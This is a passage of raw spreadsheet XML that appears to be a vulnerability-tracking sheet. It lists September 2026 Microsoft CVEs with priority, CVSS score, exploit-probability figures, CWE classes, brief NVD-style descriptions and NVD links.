t="inlineStr" /><c r="R831" s="5" t="inlineStr"><is><t>CWE-603</t></is></c><c r="S831" s="5" t="inlineStr"><is><t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T831" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t></is></c></row><row r="832"><c r="A832" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B832" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C832" s="5" t="inlineStr"><is><t>CVE-2026-68835</t></is></c><c r="D832" s="5" t="n"><v>7.1</v></c><c r="E832" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F832" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G832" s="5" t="inlineStr" /><c r="H832" s="5" t="n"><v>0.005</v></c><c r="I832" s="5" t="inlineStr" /><c r="J832" s="5" t="inlineStr" /><c r="K832" s="5" t="inlineStr" /><c r="L832" s="5" t="inlineStr" /><c r="M832" s="5" t="inlineStr" /><c r="N832" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O832" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P832" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q832" s="5" t="inlineStr" /><c r="R832" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S832" s="5" t="inlineStr"><is><t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T832" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t></is></c></row><row r="833"><c r="A833" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B833" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C833" s="5" t="inlineStr"><is><t>CVE-2026-68846</t></is></c><c r="D833" s="5" t="n"><v>7.1</v></c><c r="E833" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F833" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G833" s="5" t="inlineStr" /><c r="H833" s="5" t="n"><v>0.006</v></c><c r="I833" s="5" t="inlineStr" /><c r="J833" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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33" s="5" t="inlineStr" /><c r="M833" s="5" t="inlineStr" /><c r="N833" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O833" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P833" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q833" s="5" t="inlineStr" /><c r="R833" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S833" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T833" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t></is></c></row><row r="834"><c r="A834" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B834" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C834" s="5" t="inlineStr"><is><t>CVE-2026-68889</t></is></c><c r="D834" s="5" t="n"><v>7.1</v></c><c r="E834" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F834" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G834" s="5" t="inlineStr" /><c r="H834" s="5" t="n"><v>0.004</v></c><c r="I834" s="5" t="inlineStr" /><c r="J834" s="5" t="inlineStr" /><c r="K834" s="5" t="inlineStr" /><c r="L834" s="5" t="inlineStr" /><c r="M834" s="5" t="inlineStr" /><c r="N834" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O834" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P834" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q834" s="5" t="inlineStr" /><c r="R834" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S834" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T834" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t></is></c></row><row r="835"><c r="A835" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B835" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C835" s="5" t="inlineStr"><is><t>CVE-2026-68893</t></is></c><c r="D835" s="5" t="n"><v>7.1</v></c><c r="E835" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F835" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G835" s="5" t="inlineStr" /><c r="H835" s="5" t="n"><v>0.005</v></c><c r="I835" s="5" t="inlineStr" /><c r="J835" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K835" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L835" s="5" t="inlineStr" /><c r="M835" s="5" t="inlineStr" /><c r="N835" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O835" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P835" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q835" s="5" t="inlineStr" /><c r="R835" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S835" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T835" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t></is></c></row><row r="836"><c r="A836" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B836" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C836" s="5" t="inlineStr"><is><t>CVE-2026-69272</t></is></c><c r="D836" s="5" t="n"><v>7.1</v></c><c r="E836" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F836" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G836" s="5" t="inlineStr" /><c r="H836" s="5" t="n"><v>0.004</v></c><c r="I836" s="5" t="inlineStr" /><c r="J836" s="5" t="inlineStr" /><c r="K836" s="5" t="inlineStr" /><c r="L836" s="5" t="inlineStr" /><c r="M836" s="5" t="inlineStr" /><c r="N836" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O836" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P836" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q836" s="5" t="inlineStr" /><c r="R836" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S836" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T836" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t></is></c></row><row r="837"><c r="A837" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B837" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C837" s="5" t="inlineStr"><is><t>CVE-2026-69274</t></is></c><c r="D837" s="5" t="n"><v>7.1</v></c><c r="E837" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F837" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G837" s="5" t="inlineStr" /><c r="H837" s="5" t="n"><v>0.004</v></c><c r="I837" s="5" t="inlineStr" /><c r="J837" s="5" t="inlineStr" /><c r="K837" s="5" t="inlineStr" /><c r="L837" s="5" t="inlineStr" /><c r="M837" s="5" t="inlineStr" /><c r="N837" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O837" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P837" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q837" s="5" t="inlineStr" /><c r="R837" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S837" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T837" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t></is></c></row><row r="838"><c r="A838" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B838" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C838" s="5" t="inlineStr"><is><t>CVE-2026-69296</t></is></c><c r="D838" s="5" t="n"><v>7.1</v></c><c r="E838" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F838" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G838" s="5" t="inlineStr" /><c r="H838" s="5" t="n"><v>0.005</v></c><c r="I838" s="5" t="inlineStr" /><c r="J838" s="5" t="inlineStr" /><c r="K838" s="5" t="inlineStr" /><c r="L838" s="5" t="inlineStr" /><c r="M838" s="5" t="inlineStr" /><c r="N838" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O838" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P838" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q838" s="5" t="inlineStr" /><c r="R838" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S838" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T838" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t></is></c></row><row r="839"><c r="A839" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B839" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C839" s="5" t="inlineStr"><is><t>CVE-2026-69305</t></is></c><c r="D839" s="5" t="n"><v>7.1</v></c><c r="E839" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F839" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G839" s="5" t="inlineStr" /><c r="H839" s="5" t="n"><v>0.006</v></c><c r="I839" s="5" t="inlineStr" /><c r="J839" s="5" t="inlineStr" /><c r="K839" s="5" t="inlineStr" /><c r="L839" s="5" t="inlineStr" /><c r="M839" s="5" t="inlineStr" /><c r="N839" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O839" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P839" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q839" s="5" t="inlineStr" /><c r="R839" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S839" s="5" t="inlineStr"><is><t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T839" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t></is></c></row><row r="840"><c r="A840" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B840" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C840" s="5" t="inlineStr"><is><t>CVE-2026-69313</t></is></c><c r="D840" s="5" t="n"><v>7.1</v></c><c r="E840" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F840" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G840" s="5" t="inlineStr" /><c r="H840" s="5" t="n"><v>0.005</v></c><c r="I840" s="5" t="inlineStr" /><c r="J840" s="5" t="inlineStr" /><c r="K840" s="5" t="inlineStr" /><c r="L840" s="5" t="inlineStr" /><c r="M840" s="5" t="inlineStr" /><c r="N840" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O840" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P840" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q840" s="5" t="inlineStr" /><c r="R840" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S840" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T840" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t></is></c></row><row r="841"><c r="A841" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B841" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C841" s="5" t="inlineStr"><is><t>CVE-2026-69314</t></is></c><c r="D841" s="5" t="n"><v>7.1</v></c><c r="E841" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F841" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G841" s="5" t="inlineStr" /><c r="H841" s="5" t="n"><v>0.005</v></c><c r="I841" s="5" t="inlineStr" /><c r="J841" s="5" t="inlineStr" /><c r="K841" s="5" t="inlineStr" /><c r="L841" s="5" t="inlineStr" /><c r="M841" s="5" t="inlineStr" /><c r="N841" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O841" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P841" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q841" s="5" t="inlineStr" /><c r="R841" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S841" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T841" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t></is></c></row><row r="842"><c r="A842" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B842" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C842" s="5" t="inlineStr"><is><t>CVE-2026-69336</t></is></c><c r="D842" s="5" t="n"><v>7.1</v></c><c r="E842" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F842" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G842" s="5" t="inlineStr" /><c r="H842" s="5" t="n"><v>0.005</v></c><c r="I842" s="5" t="inlineStr" /><c r="J842" s="5" t="inlineStr" /><c r="K842" s="5" t="inlineStr" /><c r="L842" s="5" t="inlineStr" /><c r="M842" s="5" t="inlineStr" /><c r="N842" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O842" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P842" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q842" s="5" t="inlineStr" /><c r="R842" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S842" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T842" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t></is></c></row><row r="843"><c r="A843" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B843" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C843" s="5" t="inlineStr"><is><t>CVE-2026-69337</t></is></c><c r="D843" s="5" t="n"><v>7.1</v></c><c r="E843" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F843" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G843" s="5" t="inlineStr" /><c r="H843" s="5" t="n"><v>0.007</v></c><c r="I843" s="5" t="inlineStr" /><c r="J843" s="5" t="inlineStr" /><c r="K843" s="5" t="inlineStr" /><c r="L843" s="5" t="inlineStr" /><c r="M843" s="5" t="inlineStr" /><c r="N843" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O843" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P843" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q843" s="5" t="inlineStr" /><c r="R843" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S843" s="5" t="inlineStr"><is><t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T843" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t></is></c></row><row r="844"><c r="A844" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B844" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C844" s="5" t="inlineStr"><is><t>CVE-2026-69338</t></is></c><c r="D844" s="5" t="n"><v>7.1</v></c><c r="E844" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F844" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G844" s="5" t="inlineStr" /><c r="H844" s="5" t="n"><v>0.005</v></c><c r="I844" s="5" t="inlineStr" /><c r="J844" s="5" t="inlineStr" /><c r="K844" s="5" t="inlineStr" /><c r="L844" s="5" t="inlineStr" /><c r="M844" s="5" t="inlineStr" /><c r="N844" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O844" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P844" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q844" s="5" t="inlineStr" /><c r="R844" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S844" s="5" t="inlineStr"><is><t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T844" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t></is></c></row><row r="845"><c r="A845" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B845" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C845" s="5" t="inlineStr"><is><t>CVE-2026-69340</t></is></c><c r="D845" s="5" t="n"><v>7.1</v></c><c r="E845" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F845" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G845" s="5" t="inlineStr" /><c r="H845" s="5" t="n"><v>0.005</v></c><c r="I845" s="5" t="inlineStr" /><c r="J845" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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5" s="5" t="inlineStr" /><c r="M845" s="5" t="inlineStr" /><c r="N845" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O845" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P845" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q845" s="5" t="inlineStr" /><c r="R845" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S845" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T845" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t></is></c></row><row r="846"><c r="A846" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B846" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C846" s="5" t="inlineStr"><is><t>CVE-2026-69357</t></is></c><c r="D846" s="5" t="n"><v>7.1</v></c><c r="E846" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F846" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G846" s="5" t="inlineStr" /><c r="H846" s="5" t="n"><v>0.004</v></c><c r="I846" s="5" t="inlineStr" /><c r="J846" s="5" t="inlineStr" /><c r="K846" s="5" t="inlineStr" /><c r="L846" s="5" t="inlineStr" /><c r="M846" s="5" t="inlineStr" /><c r="N846" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O846" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P846" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q846" s="5" t="inlineStr" /><c r="R846" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S846" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T846" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t></is></c></row><row r="847"><c r="A847" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B847" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C847" s="5" t="inlineStr"><is><t>CVE-2026-69358</t></is></c><c r="D847" s="5" t="n"><v>7.1</v></c><c r="E847" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F847" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G847" s="5" t="inlineStr" /><c r="H847" s="5" t="n"><v>0.005</v></c><c r="I847" s="5" t="inlineStr" /><c r="J847" s="5" t="inlineStr" /><c r="K847" s="5" t="inlineStr" /><c r="L847" s="5" t="inlineStr" /><c r="M847" s="5" t="inlineStr" /><c r="N847" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O847" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P847" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q847" s="5" t="inlineStr" /><c r="R847" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S847" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T847" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t></is></c></row><row r="848"><c r="A848" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B848" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C848" s="5" t="inlineStr"><is><t>CVE-2026-69364</t></is></c><c r="D848" s="5" t="n"><v>7.1</v></c><c r="E848" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F848" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G848" s="5" t="inlineStr" /><c r="H848" s="5" t="n"><v>0.005</v></c><c r="I848" s="5" t="inlineStr" /><c r="J848" s="5" t="inlineStr" /><c r="K848" s="5" t="inlineStr" /><c r="L848" s="5" t="inlineStr" /><c r="M848" s="5" t="inlineStr" /><c r="N848" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O848" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P848" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q848" s="5" t="inlineStr" /><c r="R848" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S848" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T848" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t></is></c></row><row r="849"><c r="A849" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B849" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C849" s="5" t="inlineStr"><is><t>CVE-2026-69366</t></is></c><c r="D849" s="5" t="n"><v>7.1</v></c><c r="E849" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F849" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G849" s="5" t="inlineStr" /><c r="H849" s="5" t="n"><v>0.006</v></c><c r="I849" s="5" t="inlineStr" /><c r="J849" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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9" s="5" t="inlineStr" /><c r="M849" s="5" t="inlineStr" /><c r="N849" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O849" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P849" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q849" s="5" t="inlineStr" /><c r="R849" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S849" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T849" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t></is></c></row><row r="850"><c r="A850" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B850" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C850" s="5" t="inlineStr"><is><t>CVE-2026-69384</t></is></c><c r="D850" s="5" t="n"><v>7.1</v></c><c r="E850" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F850" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G850" s="5" t="inlineStr" /><c r="H850" s="5" t="n"><v>0.004</v></c><c r="I850" s="5" t="inlineStr" /><c r="J850" s="5" t="inlineStr" /><c r="K850" s="5" t="inlineStr" /><c r="L850" s="5" t="inlineStr" /><c r="M850" s="5" t="inlineStr" /><c r="N850" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q850" s="5" t="inlineStr" /><c r="R850" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S850" s="5" t="inlineStr"><is><t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t></is></c><c r="T850" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t></is></c></row><row r="851"><c r="A851" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B851" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C851" s="5" t="inlineStr"><is><t>CVE-2026-69396</t></is></c><c r="D851" s="5" t="n"><v>7.1</v></c><c r="E851" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F851" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G851" s="5" t="inlineStr" /><c r="H851" s="5" t="n"><v>0.005</v></c><c r="I851" s="5" t="inlineStr" /><c r="J851" s="5" t="inlineStr" /><c r="K851" s="5" t="inlineStr" /><c r="L851" s="5" t="inlineStr" /><c r="M851" s="5" t="inlineStr" /><c r="N851" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O851" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P851" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q851" s="5" t="inlineStr" /><c r="R851" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S851" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T851" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t></is></c></row><row r="852"><c r="A852" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B852" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C852" s="5" t="inlineStr"><is><t>CVE-2026-69451</t></is></c><c r="D852" s="5" t="n"><v>7.1</v></c><c r="E852" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F852" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G852" s="5" t="inlineStr" /><c r="H852" s="5" t="n"><v>0.007</v></c><c r="I852" s="5" t="inlineStr" /><c r="J852" s="5" t="inlineStr" /><c r="K852" s="5" t="inlineStr" /><c r="L852" s="5" t="inlineStr" /><c r="M852" s="5" t="inlineStr" /><c r="N852" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O852" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P852" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q852" s="5" t="inlineStr" /><c r="R852" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S852" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T852" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t></is></c></row><row r="853"><c r="A853" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B853" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C853" s="5" t="inlineStr"><is><t>CVE-2026-69460</t></is></c><c r="D853" s="5" t="n"><v>7.1</v></c><c r="E853" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F853" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G853" s="5" t="inlineStr" /><c r="H853" s="5" t="n"><v>0.005</v></c><c r="I853" s="5" t="inlineStr" /><c r="J853" s="5" t="inlineStr" /><c r="K853" s="5" t="inlineStr" /><c r="L853" s="5" t="inlineStr" /><c r="M853" s="5" t="inlineStr" /><c r="N853" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O853" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P853" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q853" s="5" t="inlineStr" /><c r="R853" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S853" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T853" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t></is></c></row><row r="854"><c r="A854" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B854" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C854" s="5" t="inlineStr"><is><t>CVE-2026-69482</t></is></c><c r="D854" s="5" t="n"><v>7.1</v></c><c r="E854" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F854" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G854" s="5" t="inlineStr" /><c r="H854" s="5" t="n"><v>0.003</v></c><c r="I854" s="5" t="inlineStr" /><c r="J854" s="5" t="inlineStr" /><c r="K854" s="5" t="inlineStr" /><c r="L854" s="5" t="inlineStr" /><c r="M854" s="5" t="inlineStr" /><c r="N854" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O854" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P854" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q854" s="5" t="inlineStr" /><c r="R854" s="5" t="inlineStr"><is><t>CWE-379</t></is></c><c r="S854" 